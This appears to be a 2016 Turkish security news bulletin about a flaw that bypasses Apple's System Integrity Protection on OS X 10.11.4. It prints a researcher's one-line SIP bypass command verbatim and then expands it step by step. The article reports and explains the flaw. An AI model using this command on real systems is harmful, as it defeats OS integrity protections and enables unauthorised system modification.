Paylaş :
İşte Apple Güvenliğini Geçmenizi Sağlayan Zararlı Kod (5.04.2016)

OS X 10.11.4 ve iOS 9.3 güncellemelerini yükleyenleri pek de sevimli olmayan bir sürpriz bekliyor. 130 milyon Apple kullanıcısını etkileyen yetki yükseltme zafiyeti hala OS X El Capitan 10.11.4 ve iOS 9.3 güncellemelerinde de devam ediyor.

 

Apple’ın Sistem Bütünlük Koruması (SIP) güvenlik mekanizmasını etkileyen açıklığı yamamak için çıkartılan güncellemeler hala buna izin verir durumda. CVE-2016-1757 kayıtlı uzaktan komut çalıştırma izin veren sıfırıncı gün açıklığını kapatmak için çıkarttıkları yama hala buna izin veriyor.

 

İşin enteresanlığı, Alman güvenlik araştırmacısı Stefan Esser’in en son güncellenmiş SIP uygulamasını aşmak için kullanılacak zararlı kodun bir tweet’e bile sığabilecek kısalıkta olması.

 

Yayınlanan kod root yetkilerinde dahi değiştiremeyeceğiniz OS X konfigürasyon dosyasını değiştirmenize olanak veriyor.

 

İşte kodumuz: ln -s /S*/*/E*/A*Li*/*/I* /dev/diskX;fsck_cs /dev/diskX 1>&-;touch /Li*/Ex*/;reboot

 

Bu kod açıldığında aslında aşağıdaki gibi bir hal alıyor;

  • ln -s /System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist /dev/diskX
  • fsck_cs /dev/diskX 1>&-
  • touch /Library/Extensions/
  • Reboot

 

Bu kod ile Apple’ın SIP teknolojisini aşarak istediğimiz işlemi çalıştırabilmek elimizde.

 


Paylaş :


Bülten Arşivi


Bizi Takip Edin
Eğitim Takvimi | Twitter Eğitim Takvimi | Linkedin Eğitim Takvimi | Facebook